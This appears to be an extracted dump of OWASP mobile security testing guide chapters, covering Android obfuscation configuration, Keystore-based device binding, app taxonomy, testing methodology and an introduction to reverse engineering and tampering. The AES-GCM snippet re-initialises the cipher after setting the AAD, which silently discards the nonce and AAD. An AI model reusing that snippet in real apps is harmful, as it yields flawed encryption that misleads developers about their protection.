Android apps can implement some of those obfuscation techniques using different tooling. For example, ProGuard offers an easy way to shrink and obfuscate code and to strip unneeded debugging information from the bytecode of Android Java apps. It replaces identifiers, such as class names, method names, and variable names, with meaningless character strings. This is a type of layout obfuscation, which doesn't impact the program's performance.
Decompiling Java classes is trivial, therefore it is recommended to always applying some basic obfuscation to the production bytecode.
Learn more about Android obfuscation techniques:
Developers use the build.gradle file to enable obfuscation. In the example below, you can see that minifyEnabled
and proguardFiles
are set. Creating exceptions to protect some classes from obfuscation (with -keepclassmembers
and -keep class
) is common. Therefore, auditing the ProGuard configuration file to see what classes are exempted is important. The getDefaultProguardFile('proguard-android.txt')
method gets the default ProGuard settings from the <Android SDK>/tools/proguard/
folder.
Further information on how to shrink, obfuscate, and optimize your app can be found in the Android developer documentation.
When you build your project using Android Studio 3.4 or Android Gradle plugin 3.4.0 or higher, the plugin no longer uses ProGuard to perform compile-time code optimization. Instead, the plugin uses the R8 compiler. R8 works with all of your existing ProGuard rules files, so updating the Android Gradle plugin to use R8 should not require you to change your existing rules.
R8 is the new code shrinker from Google and was introduced in Android Studio 3.3 beta. By default, R8 removes attributes that are useful for debugging, including line numbers, source file names, and variable names. R8 is a free Java class file shrinker, optimizer, obfuscator, and pre-verifier and is faster than ProGuard, see also an Android Developer blog post for further details. It is shipped with Android's SDK tools. To activate shrinking for the release build, add the following to build.gradle:
android {\n buildTypes {\n release {\n // Enables code shrinking, obfuscation, and optimization for only\n // your project's release build type.\n minifyEnabled true\n\n // Includes the default ProGuard rules files that are packaged with\n // the Android Gradle plugin. To learn more, go to the section about\n // R8 configuration files.\n proguardFiles getDefaultProguardFile(\n 'proguard-android-optimize.txt'),\n 'proguard-rules.pro'\n }\n }\n ...\n}\n
The file proguard-rules.pro
is where you define custom ProGuard rules. With the flag -keep
you can keep certain code that is not being removed by R8, which might otherwise produce errors. For example to keep common Android classes, as in our sample configuration proguard-rules.pro
file:
...\n-keep public class * extends android.app.Activity\n-keep public class * extends android.app.Application\n-keep public class * extends android.app.Service\n...\n
You can define this more granularly on specific classes or libraries in your project with the following syntax:
-keep public class MyClass\n
Obfuscation often carries a cost in runtime performance, therefore it is usually only applied to certain very specific parts of the code, typically those dealing with security and runtime protection.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#device-binding","title":"Device Binding","text":"The goal of device binding is to impede an attacker who tries to both copy an app and its state from device A to device B and continue executing the app on device B. After device A has been determined trustworthy, it may have more privileges than device B. These differential privileges should not change when an app is copied from device A to device B.
Before we describe the usable identifiers, let's quickly discuss how they can be used for binding. There are three methods that allow device binding:
Augmenting the credentials used for authentication with device identifiers. This make sense if the application needs to re-authenticate itself and/or the user frequently.
Encrypting the data stored in the device with the key material which is strongly bound to the device can strengthen the device binding. The Android Keystore offers non-exportable private keys which we can use for this. When a malicious actor would extract such data from a device, it wouldn't be possible to decrypt the data, as the key is not accessible. Implementing this, takes the following steps:
KeyGenParameterSpec
API.//Source: <https://developer.android.com/reference/android/security/keystore/KeyGenParameterSpec.html>\nKeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\n KeyProperties.KEY_ALGORITHM_RSA, \"AndroidKeyStore\");\nkeyPairGenerator.initialize(\n new KeyGenParameterSpec.Builder(\n \"key1\",\n KeyProperties.PURPOSE_DECRYPT)\n .setDigests(KeyProperties.DIGEST_SHA256, KeyProperties.DIGEST_SHA512)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_RSA_OAEP)\n .build());\nKeyPair keyPair = keyPairGenerator.generateKeyPair();\nCipher cipher = Cipher.getInstance(\"RSA/ECB/OAEPWithSHA-256AndMGF1Padding\");\ncipher.init(Cipher.DECRYPT_MODE, keyPair.getPrivate());\n...\n\n// The key pair can also be obtained from the Android Keystore any time as follows:\nKeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\nkeyStore.load(null);\nPrivateKey privateKey = (PrivateKey) keyStore.getKey(\"key1\", null);\nPublicKey publicKey = keyStore.getCertificate(\"key1\").getPublicKey();\n
//Source: <https://developer.android.com/reference/android/security/keystore/KeyGenParameterSpec.html>\nKeyGenerator keyGenerator = KeyGenerator.getInstance(\n KeyProperties.KEY_ALGORITHM_AES, \"AndroidKeyStore\");\nkeyGenerator.init(\n new KeyGenParameterSpec.Builder(\"key2\",\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_GCM)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)\n .build());\nSecretKey key = keyGenerator.generateKey();\n\n// The key can also be obtained from the Android Keystore any time as follows:\nKeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\nkeyStore.load(null);\nkey = (SecretKey) keyStore.getKey(\"key2\", null);\n
Cipher cipher = Cipher.getInstance(\"AES/GCM/NoPadding\");\nfinal byte[] nonce = new byte[GCM_NONCE_LENGTH];\nrandom.nextBytes(nonce);\nGCMParameterSpec spec = new GCMParameterSpec(GCM_TAG_LENGTH * 8, nonce);\ncipher.init(Cipher.ENCRYPT_MODE, key, spec);\nbyte[] aad = \"<deviceidentifierhere>\".getBytes();;\ncipher.updateAAD(aad);\ncipher.init(Cipher.ENCRYPT_MODE, key);\n\n//use the cipher to encrypt the authentication data see 0x50e for more details.\n
Use token-based device authentication (Instance ID) to make sure that the same instance of the app is used.
When we use the term \"mobile application\" or \"mobile app,\" we are referring to a self-contained computer program designed to execute on a mobile device. At the time of publication, the Android and iOS operating systems cumulatively comprise more than 99% of the mobile OS market share and mobile Internet usage has surpassed desktop usage for the first time in history. This means that mobile apps are the most widespread types of Internet-capable apps.
Also, this guide uses the term \"app\" as a general term which refers to any kind of application that runs on a mobile OS. Usually, apps run directly on the platform for which they\u2019re designed, run on top of a smart device\u2019s mobile browser, or they use a mix of these two methods. In this chapter, we will develop a mobile app taxonomy which will fit all apps into categories then discuss the variations of each app category.
We place mobile apps into four categories:
Native Apps Web Apps Hybrid Apps Progressive Web Apps
"},{"location":"MASTG/General/0x04a-Mobile-App-Taxonomy/#native-apps","title":"Native Apps","text":"If a mobile app is developed with a Software Development Kit (SDK) for developing apps specific to a mobile OS, they are referred to as native to their OS. If we are discussing a native app, we presume is was implemented in a standard programming language for that mobile operating system - Objective-C or Swift for iOS, and Java or Kotlin for Android.
Because they are designed for a specific OS with the tools meant for that OS, native apps have the capability to provide the fastest performance with the highest degree of reliability. They usually adhere to platform-specific design principles (e.g. the Android Design Principles), which usually leads to a more consistent user interface (UI) compared to hybrid or web apps. Due to their close integration with the operating system, native apps generally can directly access almost every component of the device (camera, sensors, hardware-backed key stores, etc.).
However, since Android provides two development kits - the Android SDK and the Android NDK, there is some ambiguity to the term native apps for this platform. While the SDK (based on the Java and Kotlin programming language) is the default for developing apps, the platform's NDK (or Native Development Kit) is a C/C++ kit used for developing binary libraries that can directly access lower level APIs (such as OpenGL). These libraries can be included in regular apps built with the SDK. Therefore, we say that Android native apps (i.e. built with the SDK) may have native code built with the NDK.
The most obvious disadvantage of native apps is that they are limited to one specific platform. If developers want to build their app for both Android and iOS, one needs to maintain two independent code bases, or introduce often complex development tools to port a single code base to two platforms.
Here are some multi-platform frameworks that allow developers to compile a single codebase for both Android and iOS:
If an app is developed using these these frameworks, the app will use the internal APIs native to each system and offer performance equivalent to native apps. Also, these apps can make use of all device capabilities, including the GPS, accelerometer, camera, the notification system, etc. Since the final output is very similar to previously discussed native apps, apps developed using these frameworks are said to be native apps.
"},{"location":"MASTG/General/0x04a-Mobile-App-Taxonomy/#web-apps","title":"Web Apps","text":"Mobile web apps (or simply, web apps) are websites designed to look and feel like a native app. These apps run on top of a device\u2019s browser and are usually developed in HTML5, much like a modern web page. Launcher icons may be used to parallel the same feel of accessing a native app; however, these icons are essentially the same as a browser bookmark, simply opening the default web browser to load the referenced web page.
Because they run within the confines of a browser, web apps have limited integration with the general components of the device (i.e. they are \"sandboxed\") and their performance is usually inferior compared to native apps. Since developers usually target multiple platforms with a web app, their UIs generally do not follow the design principles of any specific platform. However, web apps are popular because developers can use a single code base to reduce development and maintenance costs and distribute updates without going through the platform-specific app stores. For example, a change to the HTML file for a web app can serve as viable, cross-platform update whereas an update to a store-based app requires considerably more effort.
"},{"location":"MASTG/General/0x04a-Mobile-App-Taxonomy/#hybrid-apps","title":"Hybrid Apps","text":"Hybrid apps try to benefit from the best aspects of native and web apps. This type of app executes like a native app, but a majority of the processes rely on web technologies, meaning a portion of the app runs in an embedded web browser (commonly called \"WebView\"). As such, hybrid apps inherit both pros and cons of native and web apps. These apps can use a web-to-native abstraction layer to access to device capabilities that are not accessible to a pure web app. Depending on the framework used for development, a hybrid app code base can generate multiple apps that target different platforms and take advange of UIs that closely resembling a device's original platform.
Here are some popular frameworks for developing hybrid apps:
Progressive web apps (PWAs) combine different open standards of the web offered by modern browsers to provide benefits of a rich mobile experience. A Web App Manifest, which is a simple JSON file, can be used to configure the behavior of the app after \"installation\". These apps load like regular web pages, but differ from usual web apps in several ways.
For example, it's possible to work offline and access to mobile device hardware is possible, which has been a capacity that was only available to native apps. PWAs are supported by both Android and iOS, but not all hardware features are yet available. For example, Push Notifications, Face ID on iPhone X, or ARKit for augmented reality is not available yet on iOS.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/","title":"Mobile Application Security Testing","text":"In the following sections we'll provide a brief overview of general security testing principles and key terminology. The concepts introduced are largely identical to those found in other types of penetration testing, so if you are an experienced tester you may be familiar with some of the content.
Throughout the guide, we use \"mobile app security testing\" as a catchall phrase to refer to the evaluation of mobile app security via static and dynamic analysis. Terms such as \"mobile app penetration testing\" and \"mobile app security review\" are used somewhat inconsistently in the security industry, but these terms refer to roughly the same thing. A mobile app security test is usually part of a larger security assessment or penetration test that encompasses the client-server architecture and server-side APIs used by the mobile app.
In this guide, we cover mobile app security testing in two contexts. The first is the \"classical\" security test completed near the end of the development life cycle. In this context, the tester accesses a nearly finished or production-ready version of the app, identifies security issues, and writes a (usually devastating) report. The other context is characterized by the implementation of requirements and the automation of security tests from the beginning of the software development life cycle onwards. The same basic requirements and test cases apply to both contexts, but the high-level method and the level of client interaction differ.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#principles-of-testing","title":"Principles of Testing","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#white-box-testing-versus-black-box-testing","title":"White-box Testing versus Black-box Testing","text":"Let's start by defining the concepts:
We strongly advise that you request the source code so that you can use the testing time as efficiently as possible. The tester's code access obviously doesn't simulate an external attack, but it simplifies the identification of vulnerabilities by allowing the tester to verify every identified anomaly or suspicious behavior at the code level. A white-box test is the way to go if the app hasn't been tested before.
Even though decompiling on Android is straightforward, the source code may be obfuscated, and de-obfuscating will be time-consuming. Time constraints are therefore another reason for the tester to have access to the source code.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#vulnerability-analysis","title":"Vulnerability Analysis","text":"Vulnerability analysis is usually the process of looking for vulnerabilities in an app. Although this may be done manually, automated scanners are usually used to identify the main vulnerabilities. Static and dynamic analysis are types of vulnerability analysis.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#static-versus-dynamic-analysis","title":"Static versus Dynamic Analysis","text":"Static Application Security Testing (SAST) involves examining an app's components without executing them, by analyzing the source code either manually or automatically. OWASP provides information about Static Code Analysis that may help you understand techniques, strengths, weaknesses, and limitations.
Dynamic Application Security Testing (DAST) involves examining the app during runtime. This type of analysis can be manual or automatic. It usually doesn't provide the information that static analysis provides, but it is a good way to detect interesting elements (assets, features, entry points, etc.) from a user's point of view.
Now that we have defined static and dynamic analysis, let's dive deeper.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#static-analysis","title":"Static Analysis","text":"During static analysis, the mobile app's source code is reviewed to ensure appropriate implementation of security controls. In most cases, a hybrid automatic/manual approach is used. Automatic scans catch the low-hanging fruit, and the human tester can explore the code base with specific usage contexts in mind.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#manual-code-review","title":"Manual Code Review","text":"A tester performs manual code review by manually analyzing the mobile app's source code for security vulnerabilities. Methods range from a basic keyword search via the 'grep' command to a line-by-line examination of the source code. IDEs (Integrated Development Environments) often provide basic code review functions and can be extended with various tools.
A common approach to manual code analysis entails identifying key security vulnerability indicators by searching for certain APIs and keywords, such as database-related method calls like \"executeStatement\" or \"executeQuery\". Code containing these strings is a good starting point for manual analysis.
In contrast to automatic code analysis, manual code review is very good for identifying vulnerabilities in the business logic, standards violations, and design flaws, especially when the code is technically secure but logically flawed. Such scenarios are unlikely to be detected by any automatic code analysis tool.
A manual code review requires an expert code reviewer who is proficient in both the language and the frameworks used for the mobile app. Full code review can be a slow, tedious, time-consuming process for the reviewer, especially given large code bases with many dependencies.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#automated-source-code-analysis","title":"Automated Source Code Analysis","text":"Automated analysis tools can be used to speed up the review process of Static Application Security Testing (SAST). They check the source code for compliance with a predefined set of rules or industry best practices, then typically display a list of findings or warnings and flags for all detected violations. Some static analysis tools run against the compiled app only, some must be fed the original source code, and some run as live-analysis plugins in the Integrated Development Environment (IDE).
Although some static code analysis tools incorporate a lot of information about the rules and semantics required to analyze mobile apps, they may produce many false positives, particularly if they are not configured for the target environment. A security professional must therefore always review the results.
The chapter \"Testing Tools\" includes a list of static analysis tools, which can be found at the end of this book.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#dynamic-analysis","title":"Dynamic Analysis","text":"The focus of DAST is the testing and evaluation of apps via their real-time execution. The main objective of dynamic analysis is finding security vulnerabilities or weak spots in a program while it is running. Dynamic analysis is conducted both at the mobile platform layer and against the backend services and APIs, where the mobile app's request and response patterns can be analyzed.
Dynamic analysis is usually used to check for security mechanisms that provide sufficient protection against the most prevalent types of attack, such as disclosure of data in transit, authentication and authorization issues, and server configuration errors.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#avoiding-false-positives","title":"Avoiding False Positives","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#automated-scanning-tools","title":"Automated Scanning Tools","text":"Automated testing tools' lack of sensitivity to app context is a challenge. These tools may identify a potential issue that's irrelevant. Such results are called \"false positives\".
For example, security testers commonly report vulnerabilities that are exploitable in a web browser but aren't relevant to the mobile app. This false positive occurs because automated tools used to scan the backend service are based on regular browser-based web apps. Issues such as CSRF (Cross-site Request Forgery) and Cross-Site Scripting (XSS) are reported accordingly.
Let's take CSRF as an example. A successful CSRF attack requires the following:
Mobile apps don't fulfill these requirements: even if WebViews and cookie-based session management are used, any malicious link the user clicks opens in the default browser, which has a separate cookie store.
Stored Cross-Site Scripting (XSS) can be an issue if the app includes WebViews, and it may even lead to command execution if the app exports JavaScript interfaces. However, reflected Cross-Site Scripting is rarely an issue for the reason mentioned above (even though whether they should exist at all is arguable, escaping output is simply a best practice).
In any case, consider exploit scenarios when you perform the risk assessment; don't blindly trust your scanning tool's output.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#penetration-testing-aka-pentesting","title":"Penetration Testing (a.k.a. Pentesting)","text":"The classic approach involves all-around security testing of the app's final or near-final build, e.g., the build that's available at the end of the development process. For testing at the end of the development process, we recommend the Mobile App Security Verification Standard (MASVS) and the associated checklist as baseline for testing. A typical security test is structured as follows:
The security level at which the app will be tested must be decided before testing. The security requirements should be decided at the beginning of the project. Different organizations have different security needs and resources available for investing in test activities. Although the controls in MASVS Level 1 (L1) are applicable to all mobile apps, walking through the entire checklist of L1 and Level 2 (L2) MASVS controls with technical and business stakeholders is a good way to decide on a level of test coverage.
Organizations may have different regulatory and legal obligations in certain territories. Even if an app doesn't handle sensitive data, some L2 requirements may be relevant (because of industry regulations or local laws). For example, two-factor authentication (2FA) may be obligatory for a financial app and enforced by a country's central bank and/or financial regulatory authorities.
Security goals/controls defined earlier in the development process may also be reviewed during the discussion with stakeholders. Some controls may conform to MASVS controls, but others may be specific to the organization or app.
All involved parties must agree on the decisions and the scope in the checklist because these will define the baseline for all security testing.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#coordinating-with-the-client","title":"Coordinating with the Client","text":"Setting up a working test environment can be a challenging task. For example, restrictions on the enterprise wireless access points and networks may impede dynamic analysis performed at client premises. Company policies may prohibit the use of rooted phones or (hardware and software) network testing tools within enterprise networks. Apps that implement root detection and other reverse engineering countermeasures may significantly increase the work required for further analysis.
Security testing involves many invasive tasks, including monitoring and manipulating the mobile app's network traffic, inspecting the app data files, and instrumenting API calls. Security controls, such as certificate pinning and root detection, may impede these tasks and dramatically slow testing down.
To overcome these obstacles, you may want to request two of the app's build variants from the development team. One variant should be a release build so that you can determine whether the implemented controls are working properly and can't be bypassed easily. The second variant should be a debug build for which certain security controls have been deactivated. Testing two different builds is the most efficient way to cover all test cases.
Depending on the scope of the engagement, this approach may not be possible. Requesting both production and debug builds for a white-box test will help you complete all test cases and clearly state the app's security maturity. The client may prefer that black-box tests be focused on the production app and the evaluation of its security controls' effectiveness.
The scope of both types of testing should be discussed during the preparation phase. For example, whether the security controls should be adjusted should be decided before testing. Additional topics are discussed below.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#identifying-sensitive-data","title":"Identifying Sensitive Data","text":"Classifications of sensitive information differ by industry and country. In addition, organizations may take a restrictive view of sensitive data, and they may have a data classification policy that clearly defines sensitive information.
There are three general states from which data may be accessible:
The degree of scrutiny that's appropriate for each state may depend on the data's importance and likelihood of being accessed. For example, data held in app memory may be more vulnerable than data on web servers to access via core dumps because attackers are more likely to gain physical access to mobile devices than to web servers.
When no data classification policy is available, use the following list of information that's generally considered sensitive:
A definition of \"sensitive data\" must be decided before testing begins because detecting sensitive data leakage without a definition may be impossible.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#intelligence-gathering","title":"Intelligence Gathering","text":"Intelligence gathering involves the collection of information about the app's architecture, the business use cases the app serves, and the context in which the app operates. Such information may be classified as \"environmental\" or \"architectural\".
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#environmental-information","title":"Environmental Information","text":"Environmental information includes:
Architectural information includes:
Once the security tester has information about the app and its context, the next step is mapping the app's structure and content, e.g., identifying its entry points, features, and data.
When penetration testing is performed in a white-box or grey-box paradigm, any documents from the interior of the project (architecture diagrams, functional specifications, code, etc.) may greatly facilitate the process. If source code is available, the use of SAST tools can reveal valuable information about vulnerabilities (e.g., SQL Injection). DAST tools may support black-box testing and automatically scan the app: whereas a tester will need hours or days, a scanner may perform the same task in a few minutes. However, it's important to remember that automatic tools have limitations and will only find what they have been programmed to find. Therefore, human analysis may be necessary to augment results from automatic tools (intuition is often key to security testing).
Threat Modeling is an important artifact: documents from the workshop usually greatly support the identification of much of the information a security tester needs (entry points, assets, vulnerabilities, severity, etc.). Testers are strongly advised to discuss the availability of such documents with the client. Threat modeling should be a key part of the software development life cycle. It usually occurs in the early phases of a project.
The threat modeling guidelines defined in OWASP are generally applicable to mobile apps.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#exploitation","title":"Exploitation","text":"Unfortunately, time or financial constraints limit many pentests to application mapping via automated scanners (for vulnerability analysis, for example). Although vulnerabilities identified during the previous phase may be interesting, their relevance must be confirmed with respect to five axes:
Against all odds, some vulnerabilities may not be exploitable and may lead to minor compromises, if any. Other vulnerabilities may seem harmless at first sight, yet be determined very dangerous under realistic test conditions. Testers who carefully go through the exploitation phase support pentesting by characterizing vulnerabilities and their effects.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#reporting","title":"Reporting","text":"The security tester's findings will be valuable to the client only if they are clearly documented. A good pentest report should include information such as, but not limited to, the following:
Many pentest report templates are available on the Internet: Google is your friend!
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-and-the-sdlc","title":"Security Testing and the SDLC","text":"Although the principles of security testing haven't fundamentally changed in recent history, software development techniques have changed dramatically. While the widespread adoption of Agile practices was speeding up software development, security testers had to become quicker and more agile while continuing to deliver trustworthy software.
The following section is focused on this evolution and describes contemporary security testing.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-during-the-software-development-life-cycle","title":"Security Testing during the Software Development Life Cycle","text":"Software development is not very old, after all, so the end of developing without a framework is easy to observe. We have all experienced the need for a minimal set of rules to control work as the source code grows.
In the past, \"Waterfall\" methodologies were the most widely adopted: development proceeded by steps that had a predefined sequence. Limited to a single step, backtracking capability was a serious drawback of Waterfall methodologies. Although they have important positive features (providing structure, helping testers clarify where effort is needed, being clear and easy to understand, etc.), they also have negative ones (creating silos, being slow, specialized teams, etc.).
As software development matured, competition increased and developers needed to react to market changes more quickly while creating software products with smaller budgets. The idea of less structure became popular, and smaller teams collaborated, breaking silos throughout the organization. The \"Agile\" concept was born (Scrum, XP, and RAD are well-known examples of Agile implementations); it enabled more autonomous teams to work together more quickly.
Security wasn't originally an integral part of software development. It was an afterthought, performed at the network level by operation teams who had to compensate for poor software security! Although unintegrated security was possible when software programs were located inside a perimeter, the concept became obsolete as new kinds of software consumption emerged with web, mobile, and IoT technologies. Nowadays, security must be baked inside software because compensating for vulnerabilities is often very difficult.
\"SDLC\" will be used interchangeably with \"Secure SDLC\" in the following section to help you internalize the idea that security is a part of software development processes. In the same spirit, we use the name DevSecOps to emphasize the fact that security is part of DevOps.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#sdlc-overview","title":"SDLC Overview","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#general-description-of-sdlc","title":"General Description of SDLC","text":"SDLCs always consist of the same steps (the overall process is sequential in the Waterfall paradigm and iterative in the Agile paradigm):
The picture below illustrates all the phases and artifacts:
Based on the project's general risk profile, you may simplify (or even skip) some artifacts, and you may add others (formal intermediary approvals, formal documentation of certain points, etc.). Always remember two things: an SDLC is meant to reduce risks associated with software development, and it is a framework that helps you set up controls to that end. This is a generic description of SDLC; always tailor this framework to your projects.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#defining-a-test-strategy","title":"Defining a Test Strategy","text":"Test strategies specify the tests that will be performed during the SDLC as well as testing frequency. Test strategies are used to make sure that the final software product meets security objectives, which are generally determined by clients' legal/marketing/corporate teams. The test strategy is usually created during the Secure Design phase, after risks have been clarified (during the Initiation phase) and before code development (the Secure Implementation phase) begins. The strategy requires input from activities such as Risk Management, previous Threat Modeling, and Security Engineering.
A Test Strategy needn't be formally written: it may be described through Stories (in Agile projects), quickly enumerated in checklists, or specified as test cases for a given tool. However, the strategy must definitely be shared because it must be implemented by a team other than the team who defined it. Moreover, all technical teams must agree to it to ensure that it doesn't place unacceptable burdens on any of them.
Test Strategies address topics such as the following:
To track the testing strategy's progress and effectiveness, metrics should be defined, continually updated during the project, and periodically communicated. An entire book could be written about choosing relevant metrics; the most we can say here is that they depend on risk profiles, projects, and organizations. Examples of metrics include the following:
These are only suggestions; other metrics may be more relevant to your project. Metrics are powerful tools for getting a project under control, provided they give project managers a clear and synthetic perspective on what is happening and what needs to be improved.
Distinguishing between tests performed by an internal team and tests performed by an independent third party is important. Internal tests are usually useful for improving daily operations, while third-party tests are more beneficial to the whole organization. Internal tests can be performed quite often, but third-party testing happens at most once or twice a year; also, the former are less expensive than the latter. Both are necessary, and many regulations mandate tests from an independent third party because such tests can be more trustworthy.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-in-waterfall","title":"Security Testing in Waterfall","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#what-waterfall-is-and-how-testing-activities-are-arranged","title":"What Waterfall Is and How Testing Activities Are Arranged","text":"Basically, SDLC doesn't mandate the use of any development life cycle: it is safe to say that security can (and must!) be addressed in any situation.
Waterfall methodologies were popular before the 21st century. The most famous application is called the \"V model\", in which phases are performed in sequence and you can backtrack only a single step. The testing activities of this model occur in sequence and are performed as a whole, mostly at the point in the life cycle when most of the app development is complete. This activity sequence means that changing the architecture and other factors that were set up at the beginning of the project is hardly possible even though code may be changed after defects have been identified.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-for-agiledevops-and-devsecops","title":"Security Testing for Agile/DevOps and DevSecOps","text":"DevOps refers to practices that focus on a close collaboration between all stakeholders involved in software development (generally called Devs) and operations (generally called Ops). DevOps is not about merging Devs and Ops. Development and operations teams originally worked in silos, when pushing developed software to production could take a significant amount of time. When development teams made moving more deliveries to production necessary by working with Agile, operation teams had to speed up to match the pace. DevOps is the necessary evolution of the solution to that challenge in that it allows software to be released to users more quickly. This is largely accomplished via extensive build automation, the process of testing and releasing software, and infrastructure changes (in addition to the collaboration aspect of DevOps). This automation is embodied in the deployment pipeline with the concepts of Continuous Integration and Continuous Delivery (CI/CD).
People may assume that the term \"DevOps\" represents collaboration between development and operations teams only, however, as DevOps thought leader Gene Kim puts it: \"At first blush, it seems as though the problems are just between Devs and Ops, but test is in there, and you have information security objectives, and the need to protect systems and data. These are top-level concerns of management, and they have become part of the DevOps picture.\"
In other words, DevOps collaboration includes quality teams, security teams, and many other teams related to the project. When you hear \"DevOps\" today, you should probably be thinking of something like DevOpsQATestInfoSec. Indeed, DevOps values pertain to increasing not only speed but also quality, security, reliability, stability, and resilience.
Security is just as critical to business success as the overall quality, performance, and usability of an app. As development cycles are shortened and delivery frequencies increased, making sure that quality and security are built in from the very beginning becomes essential. DevSecOps is all about adding security to DevOps processes. Most defects are identified during production. DevOps specifies best practices for identifying as many defects as possible early in the life cycle and for minimizing the number of defects in the released app.
However, DevSecOps is not just a linear process oriented towards delivering the best possible software to operations; it is also a mandate that operations closely monitor software that's in production to identify issues and fix them by forming a quick and efficient feedback loop with development. DevSecOps is a process through which Continuous Improvement is heavily emphasized.
The human aspect of this emphasis is reflected in the creation of cross-functional teams that work together to achieve business outcomes. This section is focused on necessary interactions and integrating security into the development life cycle (which starts with project inception and ends with the delivery of value to users).
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#what-agile-and-devsecops-are-and-how-testing-activities-are-arranged","title":"What Agile and DevSecOps Are and How Testing Activities Are Arranged","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#overview","title":"Overview","text":"Automation is a key DevSecOps practice: as stated earlier, the frequency of deliveries from development to operation increases when compared to the traditional approach, and activities that usually require time need to keep up, e.g. deliver the same added value while taking less time. Unproductive activities must consequently be abandoned, and essential tasks must be fastened. These changes impact infrastructure changes, deployment, and security:
The following sections provide more details about these three points.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#infrastructure-as-code","title":"Infrastructure as Code","text":"Instead of manually provisioning computing resources (physical servers, virtual machines, etc.) and modifying configuration files, Infrastructure as Code is based on the use of tools and automation to fasten the provisioning process and make it more reliable and repeatable. Corresponding scripts are often stored under version control to facilitate sharing and issue resolution.
Infrastructure as Code practices facilitate collaboration between development and operations teams, with the following results:
Infrastructure as Code also facilitates the construction of the environments required by classical software creation projects, for development (\"DEV\"), integration (\"INT\"), testing (\"PPR\" for Pre-Production. Some tests are usually performed in earlier environments, and PPR tests mostly pertain to non-regression and performance with data that's similar to data used in production), and production (\"PRD\"). The value of infrastructure as code lies in the possible similarity between environments (they should be the same).
Infrastructure as Code is commonly used for projects that have Cloud-based resources because many vendors provide APIs that can be used for provisioning items (such as virtual machines, storage spaces, etc.) and working on configurations (e.g., modifying memory sizes or the number of CPUs used by virtual machines). These APIs provide alternatives to administrators' performing these activities from monitoring consoles.
The main tools in this domain are Puppet, Terraform, Packer, Chef and Ansible.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#deployment","title":"Deployment","text":"The deployment pipeline's sophistication depends on the maturity of the project organization or development team. In its simplest form, the deployment pipeline consists of a commit phase. The commit phase usually involves running simple compiler checks and the unit test suite as well as creating a deployable artifact of the app. A release candidate is the latest version that has been checked into the trunk of the version control system. Release candidates are evaluated by the deployment pipeline for conformity to standards they must fulfill for deployment to production.
The commit phase is designed to provide instant feedback to developers and is therefore run on every commit to the trunk. Time constraints exist because of this frequency. The commit phase should usually be complete within five minutes, and it shouldn't take longer than ten. Adhering to this time constraint is quite challenging when it comes to security because many security tools can't be run quickly enough (#paul, #mcgraw).
CI/CD means \"Continuous Integration/Continuous Delivery\" in some contexts and \"Continuous Integration/Continuous Deployment\" in others. Actually, the logic is:
The delivery and deployment of apps with low or medium sensitivity may be merged into a single step, and validation may be performed after delivery. However, keeping these two actions separate and using strong validation are strongly advised for sensitive apps.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security","title":"Security","text":"At this point, the big question is: now that other activities required for delivering code are completed significantly faster and more effectively, how can security keep up? How can we maintain an appropriate level of security? Delivering value to users more often with decreased security would definitely not be good!
Once again, the answer is automation and tooling: by implementing these two concepts throughout the project life cycle, you can maintain and improve security. The higher the expected level of security, the more controls, checkpoints, and emphasis will take place. The following are examples:
The security of an app developed with DevOps must be considered during operations. The following are examples:
Reverse engineering and tampering techniques have long belonged to the realm of crackers, modders, malware analysts, etc. For \"traditional\" security testers and researchers, reverse engineering has been more of a complementary skill. But the tides are turning: mobile app black-box testing increasingly requires disassembling compiled apps, applying patches, and tampering with binary code or even live processes. The fact that many mobile apps implement defenses against unwelcome tampering doesn't make things easier for security testers.
Reverse engineering a mobile app is the process of analyzing the compiled app to extract information about its source code. The goal of reverse engineering is comprehending the code.
Tampering is the process of changing a mobile app (either the compiled app or the running process) or its environment to affect its behavior. For example, an app might refuse to run on your rooted test device, making it impossible to run some of your tests. In such cases, you'll want to alter the app's behavior.
Mobile security testers are served well by understanding basic reverse engineering concepts. They should also know mobile devices and operating systems inside out: processor architecture, executable format, programming language intricacies, and so forth.
